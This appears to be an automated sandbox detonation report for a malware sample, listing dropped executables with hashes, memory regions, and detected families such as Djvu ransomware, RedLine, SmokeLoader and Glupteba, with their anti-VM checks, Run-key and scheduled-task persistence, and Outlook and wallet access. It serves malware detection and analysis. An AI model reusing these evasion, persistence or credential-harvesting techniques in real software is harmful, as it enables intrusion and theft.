SHA512 ce9877a36012f2a06559ce0dafedec357884291ecc801f292429e0264d0e844b677455a8f800bd9ec1e99ae8c341f15fc2306cde6a6ed3d8d24a1a7e23f938cc

memory/2976-20-0x0000000002080000-0x0000000002111000-memory.dmp

memory/2976-21-0x0000000002080000-0x0000000002111000-memory.dmp

memory/2976-22-0x0000000002120000-0x000000000223B000-memory.dmp

\Users\Admin\AppData\Local\Temp\8363.exe

MD5 22a70a0b71715402d1a4c2b912fa901f
SHA1 d5373bfe847966630647e1b416c00c2075c8d41d
SHA256 515eaeffdbc3065d08c165706e8be7a07dc778e2548b01ea566ed6308a3ecbf5
SHA512 ce9877a36012f2a06559ce0dafedec357884291ecc801f292429e0264d0e844b677455a8f800bd9ec1e99ae8c341f15fc2306cde6a6ed3d8d24a1a7e23f938cc

C:\Users\Admin\AppData\Local\Temp\8363.exe

MD5 22a70a0b71715402d1a4c2b912fa901f
SHA1 d5373bfe847966630647e1b416c00c2075c8d41d
SHA256 515eaeffdbc3065d08c165706e8be7a07dc778e2548b01ea566ed6308a3ecbf5
SHA512 ce9877a36012f2a06559ce0dafedec357884291ecc801f292429e0264d0e844b677455a8f800bd9ec1e99ae8c341f15fc2306cde6a6ed3d8d24a1a7e23f938cc

memory/2680-26-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2680-28-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2976-31-0x0000000002080000-0x0000000002111000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8363.exe

MD5 22a70a0b71715402d1a4c2b912fa901f
SHA1 d5373bfe847966630647e1b416c00c2075c8d41d
SHA256 515eaeffdbc3065d08c165706e8be7a07dc778e2548b01ea566ed6308a3ecbf5
SHA512 ce9877a36012f2a06559ce0dafedec357884291ecc801f292429e0264d0e844b677455a8f800bd9ec1e99ae8c341f15fc2306cde6a6ed3d8d24a1a7e23f938cc

C:\Users\Admin\AppData\Local\Temp\8B02.exe

MD5 73c0d14591b9438fd544c80ccee4fef1
SHA1 8eb8e501098dd00627bd7a63e0f01feb861eeac6
SHA256 ce66fdbd46087bff9a4114ed8b5268b1ba3aff912f3a9a9ce8374874092a8219
SHA512 d0c2a4baf90194865cb91cf825f16c9c546c18e1577331068a893cc09a42296b507fea01c4daad2a99d9a7e9e45453409fdb7e456b912517be4bc18c68bffc0f

memory/2628-35-0x00000000001C0000-0x00000000008FE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\A6AD.dll

MD5 b22087ac0a2a7243e85d54a92654b666
SHA1 8e131975d080cf7ab254f8c9f52ec456ce6d03ad
SHA256 4cd083e241348bf34cc2fe65a443f49bb4ecbbece875f3b4739036a6ac3001c4
SHA512 70d9ea6624b432a3ad60d52f1096437509391c41c8db5ae0cc29050ad45b16d634d5485c65eb4d187eb8ced1958a7037e291650234e1be41489131dfe86a4dd1

memory/2628-38-0x0000000076750000-0x0000000076860000-memory.dmp

memory/2628-39-0x0000000076750000-0x0000000076860000-memory.dmp

memory/2628-40-0x0000000076750000-0x0000000076860000-memory.dmp

memory/2628-41-0x00000000755F0000-0x0000000075637000-memory.dmp

memory/2628-42-0x0000000076750000-0x0000000076860000-memory.dmp

memory/2628-44-0x0000000076750000-0x0000000076860000-memory.dmp

memory/2628-45-0x0000000076750000-0x0000000076860000-memory.dmp

memory/2680-43-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2628-47-0x0000000076750000-0x0000000076860000-memory.dmp

memory/2628-49-0x0000000076750000-0x0000000076860000-memory.dmp

memory/2628-51-0x0000000076750000-0x0000000076860000-memory.dmp

memory/2628-52-0x0000000076750000-0x0000000076860000-memory.dmp

memory/2628-50-0x0000000076750000-0x0000000076860000-memory.dmp

memory/2628-53-0x0000000076750000-0x0000000076860000-memory.dmp

memory/2628-54-0x0000000076750000-0x0000000076860000-memory.dmp

\Users\Admin\AppData\Local\Temp\A6AD.dll

MD5 b22087ac0a2a7243e85d54a92654b666
SHA1 8e131975d080cf7ab254f8c9f52ec456ce6d03ad
SHA256 4cd083e241348bf34cc2fe65a443f49bb4ecbbece875f3b4739036a6ac3001c4
SHA512 70d9ea6624b432a3ad60d52f1096437509391c41c8db5ae0cc29050ad45b16d634d5485c65eb4d187eb8ced1958a7037e291650234e1be41489131dfe86a4dd1

memory/2628-57-0x0000000076750000-0x0000000076860000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\B510.exe

MD5 276f4535df7de6a669a52a4e715f678c
SHA1 4ca1872fd68cf09060c344ecae344e5337d0f0fd
SHA256 e09d5baecda5561c71711ca31bf6b3a2c40d3e5d711c035f763a3456b7dd456f
SHA512 6316d85c668a9ac0eaf60047127237f8c95f54ea640318a80ed35a60ae899d2308dca6008f2ed71c23cf416e1a95486d5a265e2939a4b252f1e8f878f854dd89

C:\Users\Admin\AppData\Local\Temp\B510.exe

MD5 276f4535df7de6a669a52a4e715f678c
SHA1 4ca1872fd68cf09060c344ecae344e5337d0f0fd
SHA256 e09d5baecda5561c71711ca31bf6b3a2c40d3e5d711c035f763a3456b7dd456f
SHA512 6316d85c668a9ac0eaf60047127237f8c95f54ea640318a80ed35a60ae899d2308dca6008f2ed71c23cf416e1a95486d5a265e2939a4b252f1e8f878f854dd89

memory/2628-63-0x00000000755F0000-0x0000000075637000-memory.dmp

memory/2628-65-0x0000000076750000-0x0000000076860000-memory.dmp

memory/2628-67-0x00000000770C0000-0x00000000770C2000-memory.dmp

memory/2680-68-0x0000000000400000-0x0000000000537000-memory.dmp

memory/3056-64-0x0000000010000000-0x00000000101D2000-memory.dmp

memory/3056-69-0x0000000000180000-0x0000000000186000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\BD89.exe

MD5 5d2f4dced61a5ca942ddd8df3e2646d9
SHA1 87a53a110db93a85c2088424ff4d3feeb24ab82f
SHA256 911a05caef8cb0bbe510c0831c0f51dab5f5e9cc6bede193167bf13d630df618
SHA512 9770d4bab8ae0d0ae777c232e87f3a43375115faca33d1a8e3e459cd98e3987ddee73166a290c93a392ec007974505f965324463b4a24d9be0c051108b3e1bd6

C:\Users\Admin\AppData\Local\Temp\BD89.exe

MD5 5d2f4dced61a5ca942ddd8df3e2646d9
SHA1 87a53a110db93a85c2088424ff4d3feeb24ab82f
SHA256 911a05caef8cb0bbe510c0831c0f51dab5f5e9cc6bede193167bf13d630df618
SHA512 9770d4bab8ae0d0ae777c232e87f3a43375115faca33d1a8e3e459cd98e3987ddee73166a290c93a392ec007974505f965324463b4a24d9be0c051108b3e1bd6

memory/1248-78-0x0000000002BD0000-0x0000000002BE6000-memory.dmp

memory/1972-79-0x0000000000400000-0x00000000007CF000-memory.dmp

memory/1972-81-0x0000000000895000-0x00000000008A8000-memory.dmp

memory/1972-83-0x0000000000220000-0x0000000000229000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\D06E.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

C:\Users\Admin\AppData\Local\Temp\D06E.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

memory/3056-88-0x0000000002200000-0x0000000002326000-memory.dmp

memory/3056-89-0x0000000002330000-0x0000000002439000-memory.dmp

memory/3056-90-0x0000000002330000-0x0000000002439000-memory.dmp

memory/3056-92-0x0000000002330000-0x0000000002439000-memory.dmp

memory/3056-93-0x0000000002330000-0x0000000002439000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

memory/2628-101-0x00000000001C0000-0x00000000008FE000-memory.dmp

memory/1272-115-0x0000000000400000-0x000000000043E000-memory.dmp

memory/1272-114-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/1272-112-0x0000000000400000-0x000000000043E000-memory.dmp

memory/1272-110-0x0000000000400000-0x000000000043E000-memory.dmp

memory/1272-109-0x0000000000400000-0x000000000043E000-memory.dmp

memory/1272-108-0x0000000000400000-0x000000000043E000-memory.dmp

memory/1272-123-0x0000000000400000-0x000000000043E000-memory.dmp

memory/1272-131-0x0000000000400000-0x000000000043E000-memory.dmp

memory/2628-135-0x0000000073AA0000-0x000000007418E000-memory.dmp

memory/2680-136-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\2259af8a-cce1-4d72-80ee-fa37b1e9acb5\8363.exe

MD5 22a70a0b71715402d1a4c2b912fa901f
SHA1 d5373bfe847966630647e1b416c00c2075c8d41d
SHA256 515eaeffdbc3065d08c165706e8be7a07dc778e2548b01ea566ed6308a3ecbf5
SHA512 ce9877a36012f2a06559ce0dafedec357884291ecc801f292429e0264d0e844b677455a8f800bd9ec1e99ae8c341f15fc2306cde6a6ed3d8d24a1a7e23f938cc

\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

\Users\Admin\AppData\Local\Temp\8363.exe

MD5 22a70a0b71715402d1a4c2b912fa901f
SHA1 d5373bfe847966630647e1b416c00c2075c8d41d
SHA256 515eaeffdbc3065d08c165706e8be7a07dc778e2548b01ea566ed6308a3ecbf5
SHA512 ce9877a36012f2a06559ce0dafedec357884291ecc801f292429e0264d0e844b677455a8f800bd9ec1e99ae8c341f15fc2306cde6a6ed3d8d24a1a7e23f938cc

C:\Users\Admin\AppData\Local\Temp\8363.exe

MD5 22a70a0b71715402d1a4c2b912fa901f
SHA1 d5373bfe847966630647e1b416c00c2075c8d41d
SHA256 515eaeffdbc3065d08c165706e8be7a07dc778e2548b01ea566ed6308a3ecbf5
SHA512 ce9877a36012f2a06559ce0dafedec357884291ecc801f292429e0264d0e844b677455a8f800bd9ec1e99ae8c341f15fc2306cde6a6ed3d8d24a1a7e23f938cc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 f4b14b414bb7d64a8aba0492c4920ebd
SHA1 7a8463089433ccb9c66a5d49baa69c0009efa069
SHA256 692ad14c0599ce59668b08554ec0fb5dbc70fc286bb0f14ca420328d3949760a
SHA512 0328bdbe490487cdbf5438927e4a2840288c3b664975a795df8f9384f7e8030665c6e3526223a3176dfc02cfbc2a40feb35b74e8d63f8c0282c5d2349dfb38bc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 4402a0fc0ec273e2c3bd6a1188700b05
SHA1 2c8ff24692967b5ae6a2b827113336b51bfe59d6
SHA256 18b75f28d4760e6da2dd7a54f388dfa8576e124acee9fa1127b0ad7be52c51b9
SHA512 fc105e88cc8c5a785914a2eb6920e4b648db2332e1984e3f61f396562229e89f6a6200859868419664cc5436750a0014934102e618088ccf7c270c13d60b9abf

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2e768736b9382ad18e2130c34f422cf7
SHA1 08bb4f20f55c6f8d5cfab5280dd045f67232a8cf
SHA256 eb57e7b948d15d86feda8ee801c8e419955c1d23190526119e79516b9b64ba9b
SHA512 007ed2cf0d880db1b4d1a810724e52522170734800f152ba51ff41fdfaec04e31eb0e5c1f9e321b358a48976e483207062fdd267803e4d946ff34557ce33cf48

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 8202a1cd02e7d69597995cabbe881a12
SHA1 8858d9d934b7aa9330ee73de6c476acf19929ff6
SHA256 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA512 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 7450e733e6aa21082c642a106b9702b9
SHA1 59078c63829f6df95658ef28e1efccdd21a9f445
SHA256 1d75d290f6b52f5766736deb1bec22d8ddbe2fbd7317b6e36665f0f341bdb85f
SHA512 6ba5460b6450a377896d153df5e05601e845ecbd439716df2d521b403d5f79576d728c9decdc445575ab95eb236ad612096ac549cf2c886d6e2f14edca21697d

C:\Users\Admin\AppData\Local\Temp\Cab55BE.tmp

MD5 f3441b8572aae8801c04f3060b550443
SHA1 4ef0a35436125d6821831ef36c28ffaf196cda15
SHA256 6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf
SHA512 5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

C:\Users\Admin\AppData\Local\Temp\Tar5B03.tmp

MD5 9441737383d21192400eca82fda910ec
SHA1 725e0d606a4fc9ba44aa8ffde65bed15e65367e4
SHA256 bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5
SHA512 7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2271ffb6bc53740d45fd20a6d74b0941
SHA1 d5d41d15296fe075f36b8eaf821823e642e5f1d6
SHA256 1ead14c33c1021270d59a59e342890ba07b5d36782238174c859dca23879791d
SHA512 83a7ec9167432fe668c6b581b68af6c035a8b6ea366d0df8fc501431541838011dc152a2e66a6d795f5035d70c26a9f2ec8161cc24627df09fd047506987ea37

\Users\Admin\AppData\Local\2d8a583c-c7d6-47f2-9d05-23133cdb8e97\build2.exe

MD5 8012f0388cdda7870e63a5723ff24e9b
SHA1 08ed4dc8ded91f4aa23324b7eac56a22a883005d
SHA256 5f44375ddddaedfcd4f2499d3e121b7d9ee627b751f2d0914a562d35d7c9a551
SHA512 f59ce84fd7a3762efb919bb8474226fdb99765f80e4a40a9a66764a1502150fe40804be5363caeda6d27fdcfe44e5897a8c624db9993c2c890d83bbb660c01d3

C:\Users\Admin\AppData\Local\2d8a583c-c7d6-47f2-9d05-23133cdb8e97\build2.exe

MD5 8012f0388cdda7870e63a5723ff24e9b
SHA1 08ed4dc8ded91f4aa23324b7eac56a22a883005d
SHA256 5f44375ddddaedfcd4f2499d3e121b7d9ee627b751f2d0914a562d35d7c9a551
SHA512 f59ce84fd7a3762efb919bb8474226fdb99765f80e4a40a9a66764a1502150fe40804be5363caeda6d27fdcfe44e5897a8c624db9993c2c890d83bbb660c01d3

C:\Users\Admin\AppData\Local\2d8a583c-c7d6-47f2-9d05-23133cdb8e97\build3.exe

MD5 41b883a061c95e9b9cb17d4ca50de770
SHA1 1daf96ec21d53d9a4699cea9b4db08cda6fbb5ad
SHA256 fef2c8ca07c500e416fd7700a381c39899ee26ce1119f62e7c65cf922ce8b408
SHA512 cdd1bb3a36182575cd715a52815765161eeaa3849e72c1c2a9a4e84cc43af9f8ec4997e642702bb3de41f162d2e8fd8717f6f8302bba5306821ee4d155626319

\Users\Admin\AppData\Local\2d8a583c-c7d6-47f2-9d05-23133cdb8e97\build3.exe

MD5 41b883a061c95e9b9cb17d4ca50de770
SHA1 1daf96ec21d53d9a4699cea9b4db08cda6fbb5ad
SHA256 fef2c8ca07c500e416fd7700a381c39899ee26ce1119f62e7c65cf922ce8b408
SHA512 cdd1bb3a36182575cd715a52815765161eeaa3849e72c1c2a9a4e84cc43af9f8ec4997e642702bb3de41f162d2e8fd8717f6f8302bba5306821ee4d155626319

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-18 18:07

Reported

2023-10-18 18:13

Platform

win10v2004-20230915-en

Max time kernel

111s

Max time network

161s

Command Line

"C:\Users\Admin\AppData\Local\Temp\NEAS.NEASNEAS779a53aa3f90186b419cce157caefc492dd5c07072bbc9560992845fbeb34c64exeexeexe_JC.exe"

Signatures

Amadey

trojan amadey

Detected Djvu ransomware

Djvu Ransomware

ransomware djvu

Glupteba

loader dropper glupteba

Glupteba payload

RedLine

infostealer redline

RedLine payload

SmokeLoader

trojan backdoor smokeloader

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\62BD.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\mi.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\62BD.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\62BD.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\mi.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\mi.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\759D.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\5F80.exe N/A

Deletes itself

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Themida packer

themida

UPX packed file

upx

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\dc7c59b8-8c2b-47e1-90e4-3d05406bc4c2\\5F80.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\5F80.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\62BD.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\mi.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SYSTEM32\schtasks.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\62BD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mi.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\9349.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\69E4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\NEAS.NEASNEAS779a53aa3f90186b419cce157caefc492dd5c07072bbc9560992845fbeb34c64exeexeexe_JC.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\NEAS.NEASNEAS779a53aa3f90186b419cce157caefc492dd5c07072bbc9560992845fbeb34c64exeexeexe_JC.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\NEAS.NEASNEAS779a53aa3f90186b419cce157caefc492dd5c07072bbc9560992845fbeb34c64exeexeexe_JC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\69E4.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\69E4.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SYSTEM32\schtasks.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SYSTEM32\schtasks.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2942 = "Sao Tome Standard Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SYSTEM32\schtasks.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2532 = "Chatham Islands Standard Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2451 = "Saint Pierre Daylight Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SYSTEM32\schtasks.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SYSTEM32\schtasks.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3051 = "Qyzylorda Daylight Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2591 = "Tocantins Daylight Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
